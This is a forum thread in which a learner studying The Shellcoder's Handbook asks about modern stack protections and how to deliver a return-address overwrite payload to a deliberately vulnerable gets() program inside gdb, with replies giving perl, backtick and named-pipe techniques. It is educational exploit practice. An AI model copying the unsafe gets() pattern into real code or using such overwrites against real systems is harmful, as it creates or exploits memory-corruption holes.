Questions on buffer overflows

httpete

1. After reading up on buffer overflows and testing examples from the shellcoders handbook it seems that there are alot of obstacles to buffer overflows these days. To run an example in chapter two I had to compile the example with the flag -fno-stack-protector to disable the stack-protector. I have also read about stack randomization with ASLR, and non executable stacks....

This is all on linux but I presume windows has similar stack protection measures. With that in mind, is there any point in stack based buffer overflows these days if there is so much protection on the stack?

Other tutorials Ive read also mention stuff like disabling stack protection and using execstack to make the stack executable so as to run examples...well what good is that in the real world when you obviously are not going to be able to control the system you are running the shellcode against? So are stack based buffer overflows 'any good' these days?

2. In one of the first examples in chapter 2 of the shellcoders handbook it gives this code -

#include <stdio.h>
#include <string.h>

void return_input(void)
{
    char array[30];
    
    gets (array);
    printf("%s\n", array);
}


int main()
{
    return_input();
    
    return 0;
}

It then explains how to overwrite the ret address in the stack with the address of the call to return_input. In my case the address to use is 0x08048405

Now it says that this address does not translate cleanly into normal ASCII characters so it says to use printf and pipe the output to the program like this -

printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08" | ./overflow

Which is all well and good. But I want to see the ret address being overwritten with gdb - I want to run the program in gdb and enter this string and then use a breakpoint after this has been entered to view the stack and see that the ret address has been overwritten with the address Ive put in the string.

"AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08" doesnt work if I enter it in gdb. It leads to 0x3530785c (\x50) being written into ret's location instead of 0x08048405.

So is there a way to input this address 0x08048405 if I run the program with gdb?

h57xiucj2z946q

httpete wrote: »

1. After reading up on buffer overflows and testing examples from the shellcoders handbook it seems that there are alot of obstacles to buffer overflows these days. To run an example in chapter two I had to compile the example with the flag -fno-stack-protector to disable the stack-protector. I have also read about stack randomization with ASLR, and non executable stacks....

This is all on linux but I presume windows has similar stack protection measures. With that in mind, is there any point in stack based buffer overflows these days if there is so much protection on the stack?

Other tutorials Ive read also mention stuff like disabling stack protection and using execstack to make the stack executable so as to run examples...well what good is that in the real world when you obviously are not going to be able to control the system you are running the shellcode against? So are stack based buffer overflows 'any good' these days?

Its still possible to exploit in some cases, its just alot more difficult. Take a look at the exploit section on the articles page here:
https://www.corelan.be/index.php/articles/

Windows has DEP (Data Execution Prevention) and also ASLR as well as some others.

Both OS's can use other tricks also to try prevent overflow exploits also.

httpete wrote: »

"AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08" doesnt work if I enter it in gdb. It leads to 0x3530785c (\x50) being written into ret's location instead of 0x08048405.

So is there a way to input this address 0x08048405 if I run the program with gdb?

Your backslash is not escapped, its been passed in as a literal string. Try this:
open your binary with gdb
# gdb -q vulnerable-app

set your breakpoints and do

run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"`

` is a backtick. Perl will escape \x and treat your bytes as bytes rather than ascii.

httpete

Angelique Dead Posy wrote: »

Its still possible to exploit in some cases, its just alot more difficult. Take a look at the exploit section on the articles page here:
https://www.corelan.be/index.php/articles/

Windows has DEP (Data Execution Prevention) and also ASLR as well as some others.

Both OS's can use other tricks also to try prevent overflow exploits also.



Your backslash is not escapped, its been passed in as a literal string. Try this:
open your binary with gdb
# gdb -q vulnerable-app

set your breakpoints and do

run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"`

` is a backtick. Perl will escape \x and treat your bytes as bytes rather than ascii.

OK I set break points and copied and pasted your code directly and it says -

/bin/bash: command substitution: line 0: unexpected EOF while looking for matching `''
/bin/bash: command substitution: line 1: syntax error: unexpected end of file

Is there supposed to be a closing apostrophe for the 'print ?

h57xiucj2z946q

httpete wrote: »

OK I set break points and copied and pasted your code directly and it says -

/bin/bash: command substitution: line 0: unexpected EOF while looking for matching `''
/bin/bash: command substitution: line 1: syntax error: unexpected end of file

Is there supposed to be a closing apostrophe for the 'print ?

There would need to be yeah. I typed this out, I haven't ran it in a shell here.

Try:

run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`

httpete

Angelique Dead Posy wrote: »

There would need to be yeah. I typed this out, I haven't ran it in a shell here.

Try:

run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`

Right I set the breakpoints and ran the program. Then when it asks for input I copy pasted `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`

But that just puts the hex version of that string on the stack. And my ret address is overwritten with 0x43424242 (CBBB).

h57xiucj2z946q

httpete wrote: »

Right I set the breakpoints and ran the program. Then when it asks for input I copy pasted `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`

But that just puts the hex version of that string on the stack. And my ret address is overwritten with 0x43424242 (CBBB).

Opps my mistake, I didn't go through the code. It reads from stdin rather than an argument. I gave you an example for an argument. To pass in something from stdin, you can do something like:

root@bt:~/tmp# mkfifo blah
root@bt:~/tmp# perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"' > blah &
[1] 5903
root@bt:~/tmp#
root@bt:~/tmp# gdb -q test
Reading symbols from /root/tmp/test...(no debugging symbols found)...done.
(gdb) run < blah
Starting program: /root/tmp/test < blah
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD�

Program received signal SIGSEGV, Segmentation fault.
0x08049ff4 in _GLOBAL_OFFSET_TABLE_ ()
(gdb)

httpete

Very nice, cheers mate